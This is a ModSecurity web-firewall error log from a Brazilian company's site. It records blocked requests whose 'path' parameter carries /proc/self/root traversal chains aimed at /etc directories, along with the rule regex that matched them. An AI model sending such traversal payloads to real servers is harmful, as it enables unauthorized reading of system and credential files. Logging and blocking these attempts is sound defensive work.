[Thu Mar 19 04:02:42.490999 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.241.31:58738] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufksdf6f5d65gmYZQ7MAAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:47.329484 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.241.31:58740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufl1_V7PWP6ixUYl6DuwAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:02:49.791875 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.241.31:33332] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufmf-YZRR_7pZ7nDJVQwAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:03:16.780500 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.241.31:33336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuftPu8EFLIOrSqIptltQAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:03:22.875323 2026] [:error] [pid 27293:tid 140411733534464] [client 74.7.241.31:46442] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufuv-YZRR_7pZ7nDJVVwAAA8E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:03:25.274425 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.241.31:46454] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufvQbLMZ6AikZjR9UlWwAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:03:43.216122 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:46462] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abufz-oXxyEfFpUF8f_ZSgAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:03:49.470961 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.241.31:41338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuf1QbLMZ6AikZjR9UleAAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:03:53.080213 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:56416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuf2cdf6f5d65gmYZQ7SQAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:03:55.471388 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.241.31:56422] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuf2_u8EFLIOrSqIptl1gAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:03:57.800169 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.241.31:56430] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuf3Pu8EFLIOrSqIptl2gAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:04:17.287742 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.228.61:40312] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuf8fu8EFLIOrSqIptl7gAAAlQ"]
[Thu Mar 19 04:04:22.325473 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.241.31:46118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuf9gkwaGbbGflqUZB8rwAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:04:26.011531 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:49680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuf-uyqAr6etmhZHNosMgAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:04:26.983756 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.243.128:46908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuf-l_V7PWP6ixUYl6EIgAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:04:27.311344 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.241.31:44966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuf-xkFeYa1D6dYQnC1ZgAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:04:31.551249 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:44968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuf_-yqAr6etmhZHNosOgAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:04:32.816853 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:44984] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugAAkwaGbbGflqUZB8tQAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:04:34.146673 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:44990] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugAsdf6f5d65gmYZQ7VgAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:04:35.428270 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:45006] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugA-yqAr6etmhZHNosPwAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:04:37.234127 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:45022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugBPu8EFLIOrSqIptl9gAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:04:39.736021 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.241.31:36918] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugB8df6f5d65gmYZQ7WAAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
